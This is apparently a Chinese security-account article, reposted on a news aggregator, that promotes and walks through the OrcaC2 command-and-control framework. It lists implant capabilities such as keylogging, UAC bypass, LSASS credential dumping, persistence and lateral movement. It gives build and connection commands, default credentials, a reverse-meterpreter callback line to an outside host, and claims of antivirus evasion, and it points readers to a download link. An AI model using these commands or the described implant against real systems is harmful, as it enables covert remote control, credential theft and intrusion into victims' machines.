服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

OrcaC2!Websocket加密C&C框架

日期: 来源:Hack分享吧收集编辑:Ptkatz&3had0w

声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。


OrcaC2是一款基于Websocket加密通信的多功能C&C框架,使用Golang实现;由三部分组成:Orca_Server(服务端)、Orca_Master(控制端)、Orca_Puppet(被控端)。


功能特性

Websocket通信,json格式传输数据,消息与数据采用AES-CBC加密+Base64编码远程命令控制(增加命令备忘录功能,可以快速选择长命令)文件上传/下载屏幕截图(被控端为Windows系统)远程屏幕控制(基于截图流,可控制键盘与鼠标)(被控端为Windows系统)键盘记录可查询被控端与被控主机基本信息(查询ip纯真库定位外网ip所对应的地理区域)进程枚举/进程终止可交互式终端(被控端为linux系统)隐藏进程(在使用ps命令时显示进程名为进程列表中任意进程,并能够删除自身程序)(被控端为linux系统)绕过UAC,获取管理员权限(被控端为Windows系统)CLR内存加载.Net程序集(被控端为Windows系统)远程加载Powershell模块(被控端为Windows系统)远程Shellcode、PE加载(支持的注入方式:CreateThread、CreateRemoteThread、RtlCreateUserThread、EtwpCreateEtwThread)(被控端为Windows系统)正/反向代理、socks5正/反向代理(支持的协议:tcp、rudp(可靠udp)、ricmp(可靠icmp)、rhttp(可靠http)、kcp、quic)多协程端口扫描(指纹识别端口信息)多协程端口爆破(支持ftp、ssh、wmi、wmihash、smb、mssql、oracle、mysql、rdp、postgres、redis、memcached、mongodb、snmp)远程ssh命令执行/文件上传/文件下载/ssh隧道远程smb命令执行(无回显)/文件上传(通过rpc服务执行命令,类似wmiexec;通过ipc$上传文件,类似psexec)使用MiniDumpWriteDump API 提取Lsass.dmp(被控端为Windows系统)CreateProcessWithPipe方式加载执行mimikatz、fscan(被控端为Windows系统);memfd方式加载执行fscan(被控端为linux系统)持久化(计划任务、注册表启动项、服务)(被控端为Windows系统)反弹meterpreter
← 左右滑动查看更多 →

编译安装

编译源码前需要先在本地安装:go (>=1.18) 、gcc


Windows系统下编译

下载并解压源码包后,直接运行install.bat文件即可。


Linux系统下编译

若install.sh执行出错需将脚本中的命令一条条单独执行

$ git clone https://github.com/Ptkatz/OrcaC2.git$ cd OrcaC2$ chmod +x install.sh$ ./install.sh


工具使用

Orca_Server服务端

存在配置文件(./conf/app.ini)与数据库文件(./db/team.db、./qqwry.dat)的情况下双击即可运行。

参数说明:
 -c: 指定配置文件路径 -au: 添加用户 -du: 删除用户 -mu: 修改用户的密码


添加一个用户:

Orca_Server_win_x64.exe -au

Orca_Master控制端

Server端数据库中默认的用户名和密码为 admin:123456。

参数说明:
 -u | --username: 连接到Server端的用户名 -p | --password: 连接到Server端的密码 -H | --host: 连接到Server端的地址,默认为127.0.0.1:6000 -c | --color: logo与命令提示符的颜色


连接到服务端:

Orca_Master_win_x64.exe -H 192.168.1.110:6000 -u 3had0w -p 123456


help:

Orca[3had0w] » helpOrcaC2 command line tool
Commands: clear clear the screen exit exit the shell generate, build generate puppet help use 'help [command]' for command help list, ls list hosts persist permission maintenance port use port scan or port brute proxy activate the proxy function select select the host id waiting to be operated ssh connects to target host over the SSH protocol

← 左右滑动查看更多 →


Orca_Puppet被控端

Puppet端可在Master端上使用generate/build命令生成

参数说明:
-host: 连接到Server端的地址,默认为127.0.0.1:6000-debug: 打开调试信息,默认为false-hide: 在Linux系统下可以伪造进程名,并删除自身程序文件


执行被控端上线:

Orca_Puppet_win_x64.exe -host 192.168.1.110:6000 -debug -hide

或者用generate/build命令重新生成木马被控端,执行后会隐藏掉当前命令终端,select id进入主机会话。


help:

Orca[3had0w] → 192.168.1.110 » help
OrcaC2 command line tool
Commands: assembly manage the CLR and execute .NET assemblies back back to the main menu clear clear the screen close close the selected remote client dump extract the lsass.dmp exec execute shellcode or pe in memory exit exit the shell file execute file upload or download generate, build generate puppet getadmin bypass uac to get system administrator privileges help use 'help [command]' for command help info get basic information of remote host keylogger get information entered by the remote host through the keyboard list, ls list hosts persist permission maintenance plugin load plugin (mimikatz|fscan) port use port scan or port brute powershell manage powershell script process, ps manage remote host processes proxy activate the proxy function reverse reverse shell screen screenshot and screensteam select select the host id waiting to be operated shell, sh send command to remote host smb lateral movement through the ipc$ pipe ssh connects to target host over the SSH protocol

← 左右滑动查看更多 →


我们还可以通过reverse命令来联动metasploit,支持tcp、http/https,内存加载执行,可过部分防护。

reverse meterpreter -t tcp -H 192.168.1.120:443


就测试到这了吧,还有很多实用功能就不逐一测试,至于如何在实战中运用就看大家自己了,有兴趣的师傅自己去测试研究下,还是挺有意思的...!


测试小结:

测试了下火绒、360、WDF,只有Win10的defender会查杀默认Puppet被控端,但用generate/build生成的可以过Win10/2016的defender、火绒、360。


BUG挺多,shell命令执行报错,WindowsTermina得到的主机会话不能输入d、f、b字符,不知道啥情况,但在cmd.exe下不会有这问题。


下载地址

点击下方名片进入公众号

回复关键字【230419】获取下载链接



关注公众号回复“1208”可以领取个人常用高效爆破字典,“0221”2020年酒仙桥文章打包,“1212”杀软对比源码+数据源,“0421”Windows提权工具包。


往期推荐工具

渗透测试常用的数据库综合利用工具

RequestTemplate红队内网渗透工具

Railgun - 一款GUI界面的渗透工具

GoBypass - Golang免杀生成工具

ByPassBehinder冰蝎WebShell免杀工具

SweetBabyScan内网资产探测漏扫工具

掩日 - 适用于红队的综合免杀工具

AuxTools浮鱼渗透辅助工具箱V1.0


POCbomber红队快速打点漏洞检测工具

相关阅读

  • SRC漏洞挖掘经验分享

  • 文章转自 戟星安全实验室侵权请联系删除0x00 信息收集在SRC漏洞挖掘过程中,保证在最短时间内提交”有效”漏洞,自我总结漏洞数量主要来源于三个方面:一、资产收集;二、学会使用
  • 青先国:心怀强核报国志 深耕仪控数十载

  • 青先国 中国核动力研究设计院、设计所仪控工程中心主任在位于祖国大西南的中国核动力研究设计院,有这样一群科技工作者,他们心怀强核报国志,几十年如一日,艰苦奋斗,无私奉献;他们
  • 万平口景区观光小火车拟调价

  • 日照日报/日照新闻网讯 为进一步规范景区内配套交通运输价格收费行为,维护旅游市场价格秩序,促进我市旅游事业的健康、可持续发展,根据国家、省有关规定,在前期调研、成本监审和
  • 贵阳轨道交通3号线启动工程信号系统动车调试

  • 近期,随着首列电客车缓缓驶离停车场开往正线轨道,贵阳轨道交通3号线一期工程信号系统动车调试正式启动,标志着距离实现开通初期运营目标又近一步。  信号系统动车调试是在新
  • iOS 15.1.1 越狱,Sileo 不再支持 XinaA15

  • 今天给大家说说,XinaA15 越狱的一些消息。XinaA15本期主要特点:支持 iOS 15.0 - iOS 15.1.1 系统。支持 A12 及以上设备。XinaA15一,最近消息Sileo 目前由 Amy 维护。2023年4月
  • 【安全圈】自学成黑客,致多家企业损失惨重!

  • 关键词黑客误信“客服”来电被骗73万元 2021年11月的一天,上海某知名律所的王律师接到了一个以400开头的电话,该号码被自动备注为某银行信用卡客服热线,对方自称是某知名金融

热门文章

  • “复活”半年后 京东拍拍二手杀入公益事业

  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。 把“闲置品”变爱心 6月12日,“益心一益·守护梦想每一步”2018年四

最新文章

  • 【请假条】恳请各位领导批准

  • 尊敬的各位领导:上午好!我是笔吧评测室的主笔猪王,由于前段时间工作强度过高,患上了心理疾病,医生、同事与家人都建议我休息一段时间。近期是笔记本电脑发布高峰期,我深刻意识到自
  • SRC漏洞挖掘经验分享

  • 文章转自 戟星安全实验室侵权请联系删除0x00 信息收集在SRC漏洞挖掘过程中,保证在最短时间内提交”有效”漏洞,自我总结漏洞数量主要来源于三个方面:一、资产收集;二、学会使用
  • OrcaC2!Websocket加密C&C框架

  • 声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。OrcaC2是一款基于Websocke
  • 女性主义视角下的二次元:乌托邦还是地狱?

  • 女性主义,可以说是近年来互联网上最热门的话题之一。而在动画领域也不例外,尤其,在以男性受众为主的日本动画中,女性主义方向研究可能更具开拓意义。比如,学术趴曾经产出过多篇从
  • 我曾有幸在电影院,看到这部划时代的动画

  • 作者 / 小趴 排版 / 呼呼 2018和2019年可谓是一个超级英雄电影“神仙打架”的年份,不仅有《复仇者联盟3》和《复仇者联盟4》创造了全球票房奇迹,《海王》《毒液:致命守护者》《